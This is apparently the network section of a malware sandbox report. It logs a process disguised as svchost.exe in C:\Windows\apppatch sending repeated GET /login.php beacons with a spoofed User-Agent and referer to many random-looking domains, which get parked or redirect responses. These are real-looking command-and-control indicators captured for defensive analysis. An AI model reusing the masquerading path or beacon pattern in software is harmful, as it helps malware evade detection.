Nov 11, 2024 18:13:01.608189106 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	58862	3.94.10.34	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.250102997 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Nov 11, 2024 18:13:01.668836117 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	58863	199.191.50.83	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.253968000 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Nov 11, 2024 18:13:03.832278013 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:13:01 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=903vr478890781963739088; expires=Sat, 10-Nov-2029 17:13:01 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 39 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 Data Ascii: a960<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scri
Nov 11, 2024 18:13:03.832324982 CET	1236	IN	Data Raw: 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69 Data Ascii: pt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21
Nov 11, 2024 18:13:03.832339048 CET	1236	IN	Data Raw: 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 21 3d 3d 22 22 29 Data Ascii: "){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.lan
Nov 11, 2024 18:13:03.832397938 CET	1236	IN	Data Raw: 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 6f 2e 74 6f 55 Data Ascii: cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,99
Nov 11, 2024 18:13:03.832411051 CET	1236	IN	Data Raw: 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 6a 2e 74 79 70 65 Data Ascii: ngth>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChil
Nov 11, 2024 18:13:03.832427025 CET	1236	IN	Data Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 Data Ascii: cument.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hi
Nov 11, 2024 18:13:03.832439899 CET	800	IN	Data Raw: 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 Data Ascii: ntListener"\|\|a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cm
Nov 11, 2024 18:13:03.832638025 CET	1236	IN	Data Raw: 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f Data Ascii: else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e\|\|[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping(
Nov 11, 2024 18:13:03.832659006 CET	1236	IN	Data Raw: 63 66 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e Data Ascii: cfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn
Nov 11, 2024 18:13:03.832762957 CET	424	IN	Data Raw: 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f Data Ascii: )}if(!("cmp_disablegpp" in window)\|\|!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)\|\|!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in windo
Nov 11, 2024 18:13:03.837711096 CET	1236	IN	Data Raw: 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 61 6c 79 71 61 7a 2e 63 6f 6d 2f 70 78 Data Ascii: script">var abp;</script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=1"></script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	58864	85.17.31.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.314892054 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	58865	23.253.46.64	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:01.359357119 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:13:01.813885927 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:12:56 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:01.813899994 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	58870	13.248.169.48	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:04.880290985 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Nov 11, 2024 18:13:05.642127037 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 17:13:05 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
Nov 11, 2024 18:13:05.646051884 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 17:13:05 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	58871	188.114.96.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:05.069365025 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Nov 11, 2024 18:13:05.769691944 CET	980	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRavtyEA%2BCeYXAMADt%2BOZhIXa%2BimtRBU6fE%2FDcwtnc8JoG3yiEeEyqrWPAZJRUhsb2yq%2BJ0WHV1LS0ldghgjqw%2F%2BW5vHX%2FVsG59ou2h4KxV76QFPli%2BYOEpM6NR2hg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9310a5141b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:08.083502054 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Nov 11, 2024 18:13:08.496052980 CET	982	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv3l2oYdbw3qJ7Prnr87rQNZIoE83Zuxii98MQIomaO91RjKFlaDEBB0wjUyIOo%2Bglu0r1mZHg5%2F%2BsebcFinfeMreRqgaTsZcqCJBV0o0LFYs%2BCR4jD6%2BksIAi%2FfKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe941dc0541b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=980&recv_bytes=486&delivery_rate=2170914&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:28.966795921 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Nov 11, 2024 18:13:29.383472919 CET	812	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTdlXRm%2Bk3okNq0M55FYS7fEuWbhn8GyNzh%2Byyf5uwM5aaRIO86JbYyN3YUt%2BlU933%2FuKUYqZDycv%2Br8sLViQkZXyFgrvCT1teaoqKMQ1xNM1G%2By7FYTNznmf0h%2F0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9c45b9841b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1962&recv_bytes=729&delivery_rate=2170914&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:13:29.384396076 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:13:31.821046114 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Nov 11, 2024 18:13:32.153229952 CET	981	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xsI9%2F8Du4Dq0LudPzz3xC%2FVhTvFQHkyAh3hWOooQ%2BZ3FRjqJwsht2Q3XfU3YLo5gZVk%2BZylTpRYdukQl2vJJp5gSN9BsrmoJcmUPNnzviC0LJp%2BWUXtEUSwr2aAXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9d63c1341b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1302&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2947&recv_bytes=972&delivery_rate=2362153&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	58874	3.94.10.34	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:05.200031042 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Nov 11, 2024 18:13:05.646775961 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345185\|1731345185\|0\|1\|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	58875	18.208.156.248	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
